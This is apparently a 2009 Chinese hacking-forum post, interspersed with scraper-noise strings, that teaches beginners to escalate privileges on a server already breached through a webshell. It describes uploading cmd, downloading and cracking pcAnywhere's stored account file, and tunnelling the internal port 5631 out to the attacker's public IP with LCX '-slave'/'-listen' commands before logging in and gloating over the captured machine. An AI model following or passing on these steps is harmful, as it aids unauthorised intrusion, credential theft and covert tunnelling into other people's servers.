|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
% t8 x. r' j% Z8 A, D2 Z) e6 v
0 U: y8 S- y j" O! N提权方法:pcanywhere+LCX
2 L) E# ~6 x k9 s0 K/ e, T- P: \8 U G9 J* \) \
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。2 ]1 P, H" Y z P2 ?* _
5 a5 ]3 T/ l1 X B; i- [; r9 J在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
& V" q" B( U6 E( l# D0 s
' C+ p) A0 v# x: J" a# i( E
& R, B2 k% z6 x0 }; f$ k* H) E查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
I' S8 p6 `9 H& ~. V1 r) j& o" `% Z; q) J6 K3 y4 T9 `
5 [( N2 ^, ~. Z* [9 n$ p/ w3 J: s" u/ `6 w
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。7 }2 v; a0 T, ^) Q M( b& V J
9 q4 f5 x( g6 Z2 y
* ~2 F; Z$ o1 N# A
1 d# n0 p, `6 |# H
; w- ~. j' U7 Y8 G( Y由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
4 H" K6 {% @1 d8 J9 V) I0 ~! t1 I4 W/ a; ]1 r0 \
4 b$ Y. y: n# V* V* J/ v* I
LCX的用法再简单说下:
5 ?2 o4 c8 L0 a: M6 ^" q" w
3 M( Q( j0 p' E# g; j1 N$ s服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
% @4 v4 S' e7 n7 F2 Y
/ N) p$ [) ]1 [. N- x$ g5 e本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)5 U% h, w/ @6 y/ m8 I+ ^6 b7 ~ z
: j6 c" _# }6 G+ N
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
9 l1 [* w; S2 O2 n& e% ]$ F顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
+ D% p& [8 `: L
# Z; i5 k. _) J; c
& m# o4 Q5 q$ b2 ]" ~. ]& ^3 I) P# B9 a+ J: P
" N4 D, Q' D$ h( ]! B呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。" B7 S4 }2 M0 _5 x# h2 a( H
! I" A9 W/ Q3 T1 e5 w0 s7 E' d, \- E0 D8 p$ r k3 g4 N% k
: M3 @! ^% n" T9 F# O! L+ j- n
7 | Z0 B! W" R# q/ j
我们本地连接试试,输入我们刚破解的账号密码 b3 K! O- Y7 w
1 Q2 _) T+ {7 C2 n# T) w
5 ?! E# {; Q# U e. E
呵呵``连接成功,服务器不错,又一个8核^︵^
7 S; @+ g. e/ e4 [4 b, \ a* T
, D! G2 K' d. ~. `* F) I: u* J4 ?1 {( B5 _ d8 x$ J1 M$ \3 c
+ n; K+ I+ K9 \( Z
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
